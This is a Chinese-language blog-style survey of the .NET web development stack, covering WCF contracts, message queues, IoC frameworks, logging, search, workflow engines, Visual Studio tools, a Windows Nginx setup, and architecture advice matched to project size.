* 具有[DataMember]的类成员，会被包含在一个数据契约中。这是严格按照自愿原则进行的，因此只有标有此属性的成员才会被包含在契约中。这也令[DataContract]较[Serializable] 更适宜作为序列化机制，毕竟后者会造成服务的内部结构被披露给外部。
* 契约也支持类的层次结构，其命名空间会伴随整个层次机构。为了支持多态及包含其他对象的容器，WCF允许服务公布一系列己知类型,数据契约的设计也考虑了版本控制问题。 只要遵循一定的规则，即使向契约中添加了新成员，现有的客户端仍能继续工作.
* 3.消息契约
* 消息契约是定义于操作之上的契约，用于访问SOAP消息头及消息体。消息的数据类型, 可以通过[DataContract]或[Serializable]定义（有类型消息)，也可以简单地定为Message类型 (无类型消息)。有类型消息之上，可以定义[MessageHeader]与[MessageBody]属性。消息的数 据结构在设计阶段可以是未知的，以取得最大的灵活度，无类型消息也能够访问SOAP消息 头和消息体。

## ****插件开发****

* Mvc Area插件开发
* OSGi.NET
* ...

## ****消息队列****

* 消息队列 - Message Queue(MQ)，是一种应用程序之间的通信机制，将部分无需立即回调获取结果，并且耗时的操作，使用异步处理的方式提高服务器的吞吐量及性能.如秒杀活动，上传任务，日志记录等
* .
* MSMQ
  + 微软官方推出的消息队列框架
* RibbitMq
  + 基于 AMQP 系统协议，由 Erlang 语言开发，开源的消息队列,支持AMQP，XMPP, SMTP, STOMP等协议，使用简单
* ZeroMQ
  + 一个轻量级的消息通信组件,侧重于点对点的消息传输上
* Redis
  + 虽是一个Key-Value的NoSQL数据库,但本身也有Queue队列功能
* ...

在分布式的系统中使用消息队列后，我们的生产者只管向消息队列中甩完数据后立即返回，而不管是哪个消费者来消费，可以看到

其实消息队列有如下三个优点。

1.  加快网站的响应速度

　   这个刚才也说了，应用层直接把消息给消息队列然后直接返回调用端，这样就避免了处理复杂的业务逻辑然后同步的插入到数据库后再返回造成的响应延迟，在很多网站上用户提交订单就是这么处理的，应用层生成一个订单号之后，将订单丢给消息队列，然后直接到订单成功页面，此时后端消费者对订单还没有处理完毕，因为后面会有比较多的数据操作，比如减库存，数据库同步等等，而用户如果想要看到订单详情，需要点击“订单号”才能进入到订单详情页，这种处理也是因为消息队列的非及时性，所以需要得到网站设计方改进和支持。

2. 提供系统的可用性

    既然是异步操作，就造成了生产者不知道消费者的存在，而反过来消费者不知道生产者的存在，如果消费者挂了就不会影响到生产者，生产者还会照常无误的向消息队列甩消息，当消费者恢复正常后就会继续消费消息队列，系统的表现可能就是email或者短信延迟收到，不会对系统造成太大的影响。

3. 并发削峰

   既然是大型网站就免不了高并发的读写操作，很典型的一个例子就是电商中的秒杀，这种高并发的写操作，如果一下子都涌入到数据库里面去了，会导致数据库的压力非常大，从而导致客户端的访问延迟，就是不挂也容易造成数据库的死锁从而造成很多灵异事件，遇到这种一拥而入的情况，我们就必须进行线性化操作，在代码层面上我们可以用lock机制来串行化，在分布式中我们用“消息队列”来[串行化](#串行化)，而且还可以通过逻辑操作来对消息队列进行动态的防洪，控洪。

 在消息队列的选择上，微软有自己的MSMQ，但是在大型网站中，我们的消息队列同样需要集群，并且希望能跑在内存中，并且支持序列

化硬盘，同时在“伸缩性”和“可靠性”上要有好的作为，所以推荐大家用用开源的RabbitMQ，网址：<http://www.rabbitmq.com/>  不过很

多公司都有自己开发的消息队列，比如携程的CMessage，淘宝的MetaQ。

## ****依赖倒置框架****

* 基于面向对象6大原则之 - 依赖倒置原则DIP - 工厂模式实现
* IOC - inversion of control 控制反转，调用者不再创建被调用者的实例，由框架(容器)创建
  + DL - Dependency Lookup 依赖查找，容器提供回调接口和上下文环境给组件
  + DI - Dependency Injection 依赖注入，容器创建好实例后再注入调用者
* .
* Autofac
  + 最为流行的IOC框架之一，轻量且高性能
* Unity
  + 最为流行的IOC框架之一，微软出品
* Spring.NET
  + 以Java版的Spring框架为基础，提供了多种功能
* Ninject
  + 一个轻量级的注入框架
* ...

## ****任务调度****

* Quartz
  + 开源的作业调度框架，是Quartz的C#移植版本
* ...

## ****日志记录****

* Log4net
  + 从java平台下移植过来的非常优秀的日志记录框架
* Nlog
  + 相对于Log4net，配置更为简单
* Microsoft.Framework.Logging
  + ASP.NET5中的日志框架集
* ...

## ****搜索引擎****

* Lucene.net
  + 是Lucene的.net移植版本，它不是一个完整的全文检索引擎，而是一个全文检索引擎的架构
* ElasticSearch
  + 是基于Lucene架构面向企业搜索应用的扩展，提供了一个分布式多用户能力的全文搜索引擎，基于RESTful web接口
* 盘古分词
  + 中文分词组件，作者肖波
* HubbleDotNet
  + 开源数据库全文搜索引擎，作者肖波
* ...

## ****工作流引擎(Workflow - WF)****

* Business Process Management - BPM 业务流程管理
* .
* Windows Workflow Foundation - WWF
  + 微软的工作流产品，提供一套工作流引擎和VS解决方案自带的流程设计器
* NetBPM
  + 从JBpm1移植到.NET平台下的开源工作流项目
* CCFlow
  + 国产开源工作流

## ****.Net常用工具及插件****

* Colorful-IDE：可以更换VS的壁纸
* [ReAttach：可以快速附加到进程（开源）](https://github.com/erlandranvinge/ReAttach)
* C# Outline：VS代码块折叠插件
* Reshaper：即时分析代码质量，消除错误，安全地更改代码库等
* OzCode：VS调试时候的辅助插件
* LINQ Pad：用来测试Linq查询的插件
* [Rextester](http://rextester.com/)：在线测试C#代码
* SmartAssembly：.Net加密混淆工具
* ConfuserEx：.Net加密混淆工具
* ILSpy：.Net反编译工具
* Reflector ：.Net反编译工具

总结归纳不易，如果有疑问或异解请留言给我。

后面我会写一些文章来让大家系统的学习web开发，而这篇技术栈我也会不断更新。

我喜欢和我一样的人交朋友，不被环境影响，自己是自己的老师，欢迎加群 .Net web交流群， QQ群：166843154 欲望与挣扎

## ****Nginx****

**Windows环境下的Nginx环境搭建**

1. 到Nginx官网上下载（http://nginx.org/en/download.html），这里我选择的是1.12.2(不知怎么的我1.14.0怎么也启动不了）
2. 将文件解压缩（路径全英文），启动cmd命令（注意：这里必须用管理员权限才能启动它）
3. 用CD命令进入根目录输入nginx.exe -t即可开启
4. 重启命令是nginx.exe -s reload 关闭命令是nginx.exe -s stop
5. 另外还要设置下打印日志的配置，可以参考https://blog.csdn.net/qq\_35624642/article/details/71056890写的很详细。
6. 好了，访问<http://localhost看到欢迎页面就行>。

串行化-----串行是指多个任务执行时，各个任务按照顺序执行，完成一个才能执行下一个。

并行化-----多个任务可以同时执行。异步是并行化的前提条件。

目录分级-----按照模块将不同的文件区分开，就能提高读取的效率

## ****.NET业务搭建技术栈****

1.企业官网

性质：访问量少，网页功能相当简单。一般为首页，公司介绍，产品介绍，联系我们等。

对应解决方案：

这类可推荐一些来源CMS，无需关心后台，设计好页面，只修改前端页面就行。

如果打算自己开发，见几个表存取下完事。不要想太复杂的架构。简单来，快速交付。

**数据库**:可采用access,SQLite或sqlserver,mysql都行。

.**net需要储备**:了解ado.net，dapper，泛型，反射等。了解数据库操作常用语句。

2.流量内容网站

整个网站属于新闻类型，有较多内容分类，日均访问量一万以下。每小时平均一千量。相对于iis每秒成百上千处理数，这点量丝毫不成压力。能日均一万访问量，那说明这个站在小圈子内有很大名气了。

对应解决方案:

仍然推荐开源或自研的cms，一般方案首页和分类定时静态化或启用缓存，明细页直读数据库或经过缓存。

**数据库**：sqlserver,mysql,mongodb

.**net储备：**

定时任务如hangfire,quartz.net，

Cache系列(页面缓存，httpruntime缓存等)，

安装windows服务topshelf

常用的设计模式等。

数据库增量备份还原与全量备份还原。数据库索引优化。

uv和pv等了解。

搜索引擎优化知识必要了解。

3.小流量业务管理系统

小流量业务管理系统的特点是业务较复杂，但用的人数可能控制在几人几十人。但业务单据一天天下来也非常多。有很多公司每年底或年初会清数据，汇集到数据仓库，新的一年新数据。我之前待过的一家集团超市公司有几个分店，业务系统基于powerbuilder开发，用的是db2数据库，每天营业额数据也挺大的。每天十点有日结，月底有月结。

对应解决方案：

这里一般是购买商业软件或者基于产品二次开发了，完全从头开发需要投入很多时间和费用。

**数据库：**sqlserver,mysql，postgresql

**.net储备:**

数据库存储过程，函数，优化，关联表等。

数据库性能重中之重。

数据库每几分钟增量备份，一周全备份。读 写分离也可以在这时介入。

Redis可以考虑引入。

设计模式有需要的场景。

在计算报表和一些情况下，多线程，并行处理数据也会考虑引入。

Dapper,EF开始了用武之地，干起来！

依赖注入，aop 可以考虑引入。

可考虑引入前端vue,element。

以上考虑部分，根据业务规模和使用频数来决定是否引入。业务量太小时，引入多余架构反而有些笨重。

4.互联网项目和大数据项目

性质：面向c端或B端。访问量大，业务多。虽然还有很多细分，但面向了互联网，我们就时刻准备着未来它能爆发式迎接大批量数据，我们的应用要高可用，健壮！时刻准备着，为未来！哪怕很多互联网公司生存周期只有几年！

数据库：Mongodb，mysql,postgresql

.net储备:

数据库集群。

Mongodb集群，分片等。

必不可少，Redis缓存，缓解数据库压力。需要了解redis运行机制，缓存穿透和缓存雪崩等。

必不可少，消息队列rabbitmq或Kafka，多业务系统之间消息传递，解藕。需要了解rabbitmq运行机制和amqp协议。

很重要 Elastic-search，Es可以通过mongo-connector实现同步mongodb数据，是一个数据极快的搜索引擎。另外可以用ELK搭建日志分析系统，这块我还需要练练手，需要了解Es如何应用，部署，问题排查等。

**理论积累之微服务**：微服务api网关，监控，服务发现，熔断降级，限流等。可参考微软olreans,Akka.net,ocelot,appllo，前些天过千的surging。有源码的常分析借鉴，理解透。

**理论积累之TDD**：单元测试，集成测试，自动化测试。

**理论积累之CI/CD**:需要熟练掌握jenkins配置。熟悉docker生态工具用法。

**理论积累之领域驱动**：微服务怎么拆？怎么微？服务之间如何联系？领域驱动设计为你提供了大量的建议，虽然不会都完美，但可以为你提供思路。领域，子域和限界上下文，领域服务，事件驱动，CQRS责任分离，贫血富血模型。我现在正在抽时间看这个，期待能有所应用。

**理论积累之.net**：

并行编程，异步编程。多线程安全等。

网络编程socket，orleans的网关连接就是基于socket，在之上又包装了一层gateway连接。socket和tcp/ip通信息息相关，熟练了这个，其他语言同样思路都会了。很多RPC框架也是基于socket，是网络连接的源泉。

.netcore mvc的通用主机，内置kestrel，中间件等，单元测试，docker运行等需要深入了解。

**理论积累之Linux**:

.netcore最重要特性是跨平台，以前对linux不熟悉的部分，需要尽快熟练，要变成一个老手。

**业务演练之单点登录**

**业务演练之秒杀**

**业务演练之短信限发**

**业务演练之实现消息队列模型**

**业务演练之实现分布式通信模型**

**业务演练之搭建微服务框架模型。**

[回顶部](#顶部)